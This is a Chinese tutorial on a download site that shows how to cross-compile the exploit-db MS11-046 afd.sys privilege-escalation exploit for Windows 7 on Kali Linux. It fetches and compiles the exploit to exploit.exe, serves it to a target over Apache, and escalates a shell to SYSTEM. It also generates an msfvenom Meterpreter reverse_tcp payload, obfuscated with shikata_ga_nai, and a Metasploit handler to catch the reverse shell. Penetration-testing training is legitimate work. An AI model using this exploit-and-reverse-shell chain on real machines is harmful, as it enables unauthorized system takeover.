[系统技巧] 在Kali Linux上编译Windows漏洞的方法
作者:CC下载站 日期:2022-09-11 05:47:31 浏览:179 分类:玩电脑
如何在Kali Linux上编译Windows漏洞!
Mingw-w64是一个用于创建Windows应用程序的自由和开源软件开发环境。 Mingw-w64最初叫Mingw32,它当时不支持64位架构。在本教程中,我们将讨论如何使用Mingw-64在 Kali Linux上编译Windows漏洞。 让我们开始在Kali Linux上安装Mingw-w64。
Mingw-w64是一个用于创建Windows应用程序的自由和开源软件开发环境。 Mingw-w64最初叫Mingw32,它当时不支持64位架构。
在本教程中,我们将讨论如何使用Mingw-64在 Kali Linux上编译Windows漏洞。 让我们开始在Kali Linux上安装Mingw-w64。
1、在Kali Linux上安装Mingw-w64
默认情况下,Kali Linux 2016.2和更低版本上未安装Mingw-w64。 因此,我们需要先安装它,然后才能在Linux上编译Windows漏洞。 执行以下命令,安装Mingw-w64:
apt-getupdateapt-getinstallmingw-w64
使用apt-get install mingw-w64在您的Kali主机上安装mingw-w64。
键入y为yes,以确认并继续Mingw-w64安装过程。 下载和安装Mingw-w64可能需要一段时间才能完成。
2、无法找到程序包mingw-w64的解决方法
有时,你尝试安装mingw-w64包时得到一个无法找到包mingw-w64的错误,并得到类似如下提示:
root@kali:~#apt-getinstallmingw-w64Readingpackagelists…DoneBuildingdependencytreeReadingstateinformation…DoneE:Unabletolocatepackagemingw-w64
要解决这个问题,请确保在sources.list文件中具有正确的存储库。您可以使用nano编辑文件:
/etc/apt/sources.list
确保您在此文件中具有正确的存储库。 您可以在以下页面上找到不同版本的Kali Linux的存储库:
http://docs.kali.org/general-use/kali-linux-sources-list-repositories
使用sources.list文件中的正确的存储库,您需要运行apt-get update,然后再次运行Mingw-w64软件包的安装命令。
3、用Mingw-w64交叉编译Windows漏洞利用
现在我们已经安装了Mingw-w64,可以开始编译Windows漏洞利用程序了。 对于本教程,我们将编译一个用C编写的Windows漏洞利用程序,以利用Windows 7 SP0 x86中的CVE-2011-1249(MS11-046)漏洞。 此版本的Windows操作系统在辅助功能驱动程序(AFD)中包含一个漏洞,允许已认证的非管理用户提升权限。即使Mingw-w64是为非常需要的64位支持开发的,我们也可以编译32位Windows漏洞。 让我们来看看如何编译32位Windows漏洞。
让我们从Exploit-db下载漏洞:
wget --output-document= 40564.c https://www.exploit-db.com/download/40564
使用以下命令编译Windows 32位的afd.sys exploit:
i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32
以下命令将编译Windows 7 afd.sys特权升级漏洞:
i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32
编译Windows漏洞。
要将漏洞利用程序转移到目标主机,我们将使用内置的ApacheWeb服务器来提供它。 最后2个命令会将exploit复制到Apache主目录并启动Apache Web服务器。
当我们从cmd.exe下载并执行该漏洞时,它将如下所示:
漏洞利用成功执行。
因为我们可以看到whoami命令在执行exploit之前返回一个普通用户权限,之后显示是system用户权限。这个exploit实际上在当前shell中生成一个新的shell,而不是在新窗口中创建一个新的shell。这意味着我们也可以从命令行shell运行此漏洞利用程序,例如Meterpreter。让我们看看如何从Meterpreter会话运行漏洞利用。
4、利用编译错误
当编译针对不同架构和操作系统的漏洞时,可能会发生许多错误。有很多因素可能导致编译失败,例如:语法,库,主机和目标体系结构,用于编译代码的已安装软件等等。一些错误可能很容易修复,有些错误则不是。同样重要的是不同的警告来自致命的错误,因为警告可能只是指示一些类似的过时的功能,不能阻止漏洞的工作。致命错误会阻止漏洞利用,因此需要修复。
处理编译错误的最佳方法是仔细阅读,然后在Google上搜索解决方案。通常你不是第一个也不是唯一面对某个编译错误的人,因此没有必要重新发明轮子。在线资源(如堆栈交换)通常为您提供最常见的编译错误的可能解决方案。
5、从Meterpreter shell中利用MS11-046
让我们使用Msfvenom快速生成Windows 32位Meterpreter反向TCP有效负载,并在目标主机上执行它。 我们将在Metasploit中使用多处理程序来捕获反向shell。
使用以下命令使用Msfvenom创建有效负载:
msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe
请务必更换侦听主机IP,必要时更换侦听端口。现在启动msfconsole并运行以下命令来设置多处理器漏洞:
useexploit/multi/handlersetlhost[listeninghostIP]setlport4444run
在端口4444上启动反向TCP处理程序。
然后下载利用程序到目标主机并执行它。 如果一切设置正确,您应该在msfconsole上收到一个反向Meterpreter shell:
目标主机连接回Kali。
在Meterpreter命令行上运行下一“shell”命令并运行特权升级漏洞利用程序将shell升级到系统shell:
特权升级攻击通过我们的Meterpreter会话成功执行。
正如你可以看到的,shell从特权测试用户shell变化到系统shell。 请注意,在执行它的shell中生成一个新的系统shell。 因此,我们不能看到利用输出,因为它是在有限的特权的旧shell。
您可以通过键入Exit来验证这一点,将退出系统shell并返回到仍包含Windows 7权限升级exploit输出的用户shell:
特权用户shell上的exploit输出。
学到的东西
在本教程中,我们已经了解了在Linux上针对Windows的交叉编译漏洞的基础知识。 我们已经学习了如何在Kali Linux上安装Mingw-w64并解决最常见的安装问题。 为了练习漏洞编译过程,我们编译了一个针对Windows7 x86的特权提升漏洞。 这也称为交叉编译。
我们已成功的在目标主机上执行已编译的可执行文件,并将shell从有限的用户shell升级到系统shell。 我们已经知道,这个特殊的exploit在shell中生成了一个shell,在这个shell中执行了exploit。 这样,我们还可以从命令行(例如Meterpreter shell)执行特权提升漏洞利用。
最后但同样重要的是,我们已经了解了如何在编译过程中修复错误。
猜你还喜欢
- 03-12 [Linux] Linux Kernel v4.14.6 Stable 长期支持版本
- 03-12 [Linux]深度Linux Deepin 2014.3 正式版发布
- 04-06 [计算机与网络] 《Linux就该这么学》—非常适合linux技术学习的入门好书
- 07-16 [LINUX] Linux集群内SSH免密码访问的快速配置方法
- 10-21 [操作系统]《红帽企业Linux 6.4 桌面版》(Red Hat Enterprise Linux 6.4 Desktop)x86/64,官方多国语言版[光盘镜像]
- 10-21 [操作系统]《红帽企业Linux 5.9服务器版》(Red Hat Enterprise Linux 5.9 Server)x86/64[光盘镜像]
- 10-21 [操作系统]《红帽企业Linux 6.4 服务器版》(Red Hat Enterprise Linux 6.4 Server)x86/64,官方多国语言版[光盘镜像]
- 10-21 [操作系统]《红帽企业Linux 6.4 工作站版》(Red Hat Enterprise Linux 6.4 Workstation)x86/64,官方多国语言版[光盘镜像]
- 07-29 [素材] PS模版 中式中国风古典线条LOGO婚礼派对背景设计素材
- 06-02 [网络工具] FinalShell: 可替代Xshell的SSH工具 / 支持Linux、Windows、Mac / 免费远程桌面加速(更新时间2018.7.19)
- 08-25 [课程] 马哥Linux高端运维云计算就业班课程
- 10-23 [Linux] Linux 系统目录结构
取消回复欢迎 你 发表评论:
- 精品推荐!
-
- 最新文章
- 热门文章
- 热评文章
[纪录片] 中国海南·雨林秘境.第1季[2024]
[台剧] 我的男孩 [国语] [MP4]
[稀缺资源] 剧情杀剧本100套-快速收藏 [1G]
[音乐] 抖音网红热门歌曲(600首)精选集 2024 [mp3格式/5.3GB]
[书籍] 【帛书版】合集
[老照片] 一万张珍贵历史老照片【jpg 40.4GB】
[素材] 2024新年春节烟花素材合集【PSD格式+PNG格式】
[美剧] 《生活大爆炸》S01-S12季合集 【1080P 蓝光原盘REMUX】 DTS-HD.MA.5.1 【外挂简英双语字幕】 742.8G
[电影] 茶馆(1982)蓝光原盘REMUX 内封简繁英.简中简繁四字幕【33.9G】本片根据老舍同名原著改编
[电视剧] 永夜星河(2024)【4K 2160P 杜比音效】国语中字【全32集完结】爱情,古装 又名 :黑莲花攻略手册
[书籍] 彭子益医书合集 [PDF/DOC]
[动画] 2002《火影忍者》720集全【4K典藏版】+11部剧场版+OVA+漫画 内嵌简日字幕
[剧集] 《斯巴达克斯》1-4季合集 无删减版 1080P 内嵌简英特效字幕
[电影] 《变形金刚系列》七部合集 [4K HDR 蓝光] 国英双语音轨 [内封精品特效字幕]【典藏版】235G
[动画] 收藏版:1996-2024年名侦探柯南全系列1080P,含国配、日配双语版+26部剧场作品
[CG剧情] 《黑神话:悟空》158分钟CG完整剧情合集 4K120帧最高画质
[纪录片] B站食贫道收费纪录片 *迷失东京* [1080P] 揭露日本大家感兴趣却不为人知的秘密
[电影] 《神奇动物在哪里三部合集》 4K REMUX原盘 [杜比视界] [国英双语音轨] 特效字幕 [171.1G]
[电影] 我的阿勒泰 (2024) 4K内封简繁 全8集 9.57G
[动画] 西游记 (1999) 动画版 4K 全52集 高清修复版 童年回忆
[电影] 《黄飞鸿》全系列合集
[Android] 开罗游戏 ▎像素风格的模拟经营的游戏厂商安卓游戏大合集
[游戏合集] 要战便战 v0.9.107 免安装绿色中文版
[电影] 【珍藏版】20世纪电影合集从1922年到1990年代,看看爷爷辈的电影是什么样合集约212G
[书籍] 彭子益医书合集 [PDF/DOC]
[系统]【黑果小兵】macOS Big Sur 11.0.1 20B50 正式版 with Clover 5126 黑苹果系统镜像下载
[美图] 【经典收藏美图集合】1500多张韩国美女高清图片让你的收藏夹更加丰富多彩
[瓜] 青岛【路虎女】插队、逆行、追尾、打人未删减【完整版视频】
[电视剧] 灵魂摆渡(1-3季合集)【未删减】【4K.无水印】【剧情/恐怖/惊悚】【豆瓣8.7】
[书籍资料] 《玉房秘诀》《玉房秘典》《古代房中术》
- 最新评论
-
电影很不错谢谢分享贪睡的猫 评论于:11-18 一部不错的经典科幻kelvin 评论于:11-13 找了好久的资源,终于在这里找到了。感谢本站的资源和分享。谢谢285552528 评论于:11-09 找了好久的资源bjzchzch12 评论于:11-07 谢谢分享感谢ppy2016 评论于:11-05 谢谢分享感谢ppy2016 评论于:11-05 有靳东!嘻嘻奥古斯都.凯撒 评论于:10-28 流星花园是F4处女作也是4人集体搭配的唯一一部!奥古斯都.凯撒 评论于:10-28 找了好久的资源,终于在这里找到了。感谢本站的资源和分享。谢谢AAAAA 评论于:10-26 找了好久的资源,终于在这里找到了。感谢本站的资源和分享。谢谢password63 评论于:10-26
- 热门tag